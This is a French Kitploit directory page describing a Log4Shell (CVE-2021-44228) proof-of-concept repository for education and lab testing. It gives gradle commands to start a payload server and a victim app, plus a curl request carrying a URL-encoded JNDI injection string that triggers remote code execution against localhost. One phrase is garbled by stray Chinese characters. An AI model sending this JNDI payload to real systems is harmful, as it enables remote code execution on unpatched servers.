Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j2-rce-poc — Une preuve de concept minimale pour la vulnérabilité Log4j2 JNDI RCE (CVE-2021-44228/Log4Shell). | Kitploit
Outils/GitHubGitHub/unlimitedsola/log4j2-rce-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à Distance
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

Une preuve de concept minimale pour la vulnérabilité Log4j2 JNDI RCE (CVE-2021-44228/Log4Shell).

Voir le dépôt
32il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept de la vulnérabilité RCE Log4j2

Une preuve de概念 minimaliste pour la vulnérabilité d'exécution de code à distance (RCE) via JNDI dans Log4j2 (CVE-2021-44228). Ceci est destiné à des fins éducatives afin d'aider les personnes qui ne sont pas des chercheurs en sécurité à comprendre comment cela fonctionne et quelle est l'ampleur de l'impact.

La POC contourne l'obligation de définir les propriétés com.sun.jndi.rmi.object.trustURLCodebase et com.sun.jndi.cosnaming.object.trustURLCodebase sur true, qui ont été désactivées par défaut depuis 8u121, 7u131, 6u141.

Prérequis

  • JDK 1.8

Remarque : JDK 1.8 est requis pour la compilation du payload-server, mais le victim-app est vulnérable jusqu'à JDK 15 inclus, car le moteur Nashorn a été supprimé dans JDK 15.

Pour tester

  1. Démarrez le payload-server en exécutant :
root@kitploit:~
$ ./gradlew runPayloadServer
  1. Ouvrez une nouvelle session de terminal, puis démarrez le victim-app :
root@kitploit:~
$ ./gradlew runVictimApp
  1. Exécutez curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D pour déclencher la RCE.
  2. Pour prouver que le code distant a été exécuté, vérifiez le journal de la console de victim-app. Vous devriez voir un journal non intentionnel imprimé à l'écran.
Télécharger l’outil